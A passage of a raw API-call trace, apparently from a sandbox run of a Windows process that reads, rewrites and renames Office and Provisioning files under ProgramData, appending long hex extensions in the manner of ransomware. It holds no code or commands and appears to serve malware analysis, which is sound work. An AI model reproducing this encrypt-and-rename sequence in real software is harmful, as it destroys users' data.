returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.16F4E381E48D0162EE67461A5365EBAC257148C9DDB30EE640C0B7F823854914" [0105.524] GetProcessHeap () returned 0x600000 [0105.524] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1b0) returned 0x6dcfc8 [0105.524] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x26fff60, FileInformation=0x6dcfc8, Length=0x1b0, FileInformationClass=0xa) returned 0x0 [0105.526] CloseHandle (hObject=0x31c) returned 1 [0105.532] GetProcessHeap () returned 0x600000 [0105.532] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0105.534] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.540] ReadFile (in: hFile=0x30c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.540] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.541] WriteFile (in: hFile=0x30c, lpBuffer=0x6d48e8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 0x0 [0105.542] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.542] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x26fff70) returned 0x0 [0105.543] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml", lpString2=".A745D989DD6E2FC25A95CA19F91AB5317830D83792361AB0A827B46A46020B39" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.A745D989DD6E2FC25A95CA19F91AB5317830D83792361AB0A827B46A46020B39") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.A745D989DD6E2FC25A95CA19F91AB5317830D83792361AB0A827B46A46020B39" [0105.543] GetProcessHeap () returned 0x600000 [0105.543] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a0) returned 0x6dd180 [0105.543] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x26fff60, FileInformation=0x6dd180, Length=0x1a0, FileInformationClass=0xa) returned 0x0 [0105.544] CloseHandle (hObject=0x30c) returned 1 [0105.550] GetProcessHeap () returned 0x600000 [0105.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0105.551] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.559] ReadFile (in: hFile=0x30c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.559] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.639] WriteFile (in: hFile=0x30c, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.640] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.641] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x26fff70) returned 0x0 [0105.641] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml", lpString2=".8D9A543B57F9B91D99262495D368E23F537BCF6F72A149400D163CC63DE67B4B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.8D9A543B57F9B91D99262495D368E23F537BCF6F72A149400D163CC63DE67B4B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.8D9A543B57F9B91D99262495D368E23F537BCF6F72A149400D163CC63DE67B4B" [0105.641] GetProcessHeap () returned 0x600000 [0105.642] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a6) returned 0x6dd328 [0105.642] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x26fff60, FileInformation=0x6dd328, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0105.643] CloseHandle (hObject=0x30c) returned 1 [0105.647] GetProcessHeap () returned 0x600000 [0105.647] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0105.648] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.652] WriteFile (in: hFile=0x31c, lpBuffer=0x315b140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 0x0 [0105.653] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.851] ReadFile (in: hFile=0x31c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0105.855] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.935] ReadFile (in: hFile=0x31c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.949] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.950] WriteFile (in: hFile=0x32c, lpBuffer=0x3184b90*, nNumberOfBytesToWrite=0x3600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58) returned 1 [0105.951] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.084] ReadFile (in: hFile=0x31c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0106.084] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.084] WriteFile (in: hFile=0x32c, lpBuffer=0x3184b90*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58) returned 1 [0106.096] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.096] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x3164b08, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x3164b08, ReturnLength=0x26fff70) returned 0x0 [0106.097] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpString2=".0FFEB1C1B8D79E252D2AFB77165CE2747E060017E160D17D37A0D16E33B83205" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.0FFEB1C1B8D79E252D2AFB77165CE2747E060017E160D17D37A0D16E33B83205") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.0FFEB1C1B8D79E252D2AFB77165CE2747E060017E160D17D37A0D16E33B83205" [0106.097] GetProcessHeap () returned 0x600000 [0106.097] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1be) returned 0x3163c08 [0106.097] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x26fff60, FileInformation=0x3163c08, Length=0x1be, FileInformationClass=0xa) returned 0x0 [0106.098] CloseHandle (hObject=0x32c) returned 1 [0106.100] GetProcessHeap () returned 0x600000 [0106.100] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3164a58 | out: hHeap=0x600000) returned 1 [0106.101] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.682] ReadFile (in: hFile=0x31c, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0106.684] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.784] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x26fff70) returned 0x0 [0106.785] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml", lpString2=".0E7A4551C407F4B9B53A3F7562F5D06C94161D2E52E85CF88476A2B8E71BC71C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml.0E7A4551C407F4B9B53A3F7562F5D06C94161D2E52E85CF88476A2B8E71BC71C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml.0E7A4551C407F4B9B53A3F7562F5D06C94161D2E52E85CF88476A2B8E71BC71C" [0106.785] GetProcessHeap () returned 0x600000 [0106.785] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x178) returned 0x318fc20 [0106.785] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x26fff60, FileInformation=0x318fc20, Length=0x178, FileInformationClass=0xa) returned 0x0 [0106.788] CloseHandle (hObject=0x31c) returned 1 [0106.789] GetProcessHeap () returned 0x600000 [0106.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0106.790] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.805] ReadFile (in: hFile=0x31c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0106.805] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.819] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x26fff70) returned 0x0 [0106.820] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml", lpString2=".97868653C4BD6B54E148F197B536BEE7F241ED3AEB0DD6E6706A99AFA0011038" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.97868653C4BD6B54E148F197B536BEE7F241ED3AEB0DD6E6706A99AFA0011038") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.97868653C4BD6B54E148F197B536BEE7F241ED3AEB0DD6E6706A99AFA0011038" [0106.820] GetProcessHeap () returned 0x600000 [0106.820] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x318fda0 [0106.820] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x26fff60, FileInformation=0x318fda0, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0106.822] CloseHandle (hObject=0x31c) returned 1 [0106.824] GetProcessHeap () returned 0x600000 [0106.824] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.825] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.831] ReadFile (in: hFile=0x31c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x1400, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0106.831] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.831] WriteFile (in: hFile=0x31c, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0106.832] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.832] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x26fff70) returned 0x0 [0106.833] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml", lpString2=".3937F94E11B3568AEC37EDCBCDE859201BA8FA9123D01DC11B499EF133DE3F3F" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.3937F94E11B3568AEC37EDCBCDE859201BA8FA9123D01DC11B499EF133DE3F3F") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.3937F94E11B3568AEC37EDCBCDE859201BA8FA9123D01DC11B499EF133DE3F3F" [0106.833] GetProcessHeap () returned 0x600000 [0106.833] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x6ee850 [0106.833] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x26fff60, FileInformation=0x6ee850, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0106.834] CloseHandle (hObject=0x31c) returned 1 [0106.837] GetProcessHeap () returned 0x600000 [0106.837] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.839] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.863] ReadFile (in: hFile=0x32c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0106.863] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.865] WriteFile (in: hFile=0x32c, lpBuffer=0x6d48e8, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 0x0 [0106.867] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.876] ReadFile (in: hFile=0x314, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0106.876] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.877] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x26fff70) returned 0x0 [0106.878] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml", lpString2=".E00A73B9F049ACDB9C2C2E20048A6CE8795A662EA603CDB17BC7EBF9B03C6372" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml.E00A73B9F049ACDB9C2C2E20048A6CE8795A662EA603CDB17BC7EBF9B03C6372") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml.E00A73B9F049ACDB9C2C2E20048A6CE8795A662EA603CDB17BC7EBF9B03C6372" [0106.878] GetProcessHeap () returned 0x600000 [0106.878] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x178) returned 0x318bf28 [0106.878] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x26fff60, FileInformation=0x318bf28, Length=0x178, FileInformationClass=0xa) returned 0x0 [0106.884] CloseHandle (hObject=0x314) returned 1 [0106.886] GetProcessHeap () returned 0x600000 [0106.886] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0106.887] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.902] ReadFile (in: hFile=0x31c, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0106.902] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.907] WriteFile (in: hFile=0x31c, lpBuffer=0x3183f08, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 0x0 [0106.908] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.919] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x26fff70) returned 0x0 [0106.920] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml", lpString2=".29EEF47DEF9FC159363B83176A127FE9D31FF7607F81E6B741670D86D4A68129" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.29EEF47DEF9FC159363B83176A127FE9D31FF7607F81E6B741670D86D4A68129") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.29EEF47DEF9FC159363B83176A127FE9D31FF7607F81E6B741670D86D4A68129" [0106.920] GetProcessHeap () returned 0x600000 [0106.920] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x318c230 [0106.920] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x26fff60, FileInformation=0x318c230, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0106.922] CloseHandle (hObject=0x31c) returned 1 [0106.925] GetProcessHeap () returned 0x600000 [0106.926] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0106.927] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.939] ReadFile (in: hFile=0x31c, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0106.939] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.954] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x26fff70) returned 0x0 [0106.954] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml", lpString2=".24573DE981C0717B812B75A2CEB24250474C6F059BD938193ED15754443D1B21" | out: 